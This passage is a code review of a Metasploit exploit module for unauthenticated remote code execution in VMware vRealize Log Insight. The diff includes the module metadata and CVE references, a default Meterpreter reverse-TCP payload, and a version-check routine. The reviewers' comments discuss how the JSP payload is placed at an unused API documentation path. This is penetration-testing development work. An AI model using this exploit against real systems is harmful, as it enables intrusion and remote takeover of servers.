modules/exploits/linux/http/vmware_vrli_rce.rb

```diff
@@ -0,0 +1,283 @@
+          specially crafted PAK archive, which then will place the JSP payload under a certain API
+          endpoint (pre-authenticated) location upon extraction for gaining remote code execution.
+
+          Successfully tested against version 8.0.2.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Horizon3.ai Attack Team', # Original POC & analysis
+          'Ege BALCI <egebalci[at]pm.me>', # Metasploit Module
+        ],
+        'References' => [
+          ['ZDI', '23-116'],
+          ['ZDI', '23-115'],
+          ['CVE', '2022-31706'],
+          ['CVE', '2022-31704'],
+          ['CVE', '2022-31711'],
+          ['URL', 'https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-technical-deep-dive'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0001.html'],
+        ],
+        'DisclosureDate' => '2023-01-24',
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'VMware vRealize Log Insight < v8.10.2',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'SSL' => true,
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+          'WfsDelay' => 15
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptPort.new('THRIFT_PORT', [true, 'Thrift service port', 16520]),
+        OptInt.new('THRIFT_TIMEOUT', [true, 'Timeout duration for thrift service', 10]),
+        OptString.new('TARGETURI', [true, 'The URI of the Rudder API', '/']),
+      ]
+    )
+  end
+
+  def check
+    print_status "Checking if #{peer} can be exploited."
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'i18n', 'component'),
+      'method' => 'GET'
+    })
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+    translation = JSON.parse(res.body.gsub(/^.+= /, '').gsub(/;/, ''))
+    return Exploit::CheckCode::Unknown if translation.nil? || !translation.key?('version')
+    if translation['version'] <= Rex::Version.new('8.10') # This is not exactly the product version but we can use it to detect if it is vulnerable
+      return Exploit::CheckCode::Appears("VMware XRLI Version: #{translation['version']}")
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
```

Comment:
After a quick search I couldn't find info on the Log Insight's API versions. The target you tested was `v5` and on my `VMware-vRealize-Log-Insight-8.10.0.0-21685412_OVF10.ova` the API version was `v2`. 

Looping over `(1..5)` might be overkill. 
```suggestion
   def get_api_version
    (1..5).each do |x|
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'rest-api', "v#{x}"),
        'method' => 'GET'
      })
      next unless res && res.code == 200

      return "v#{x}"
    end
    fail_with(Failure::UnexpectedReply, 'The version of the API was unable to be determined')
  end
  
```

Reply:
I think you misunderstood the API situation. There is no API version 5, I decided to write the JSP payload into a non existing API documentation for not breaking/overwriting the existing ones. And the reason we are writing the JSP payload as a API documentation is because there is only several unauthenticated routes which can be accessed remotely, and this one requires a specific request route.

Reply:
So we don't actually need to get the API version it will always be `v1` and `v2` since this is a EOL product :)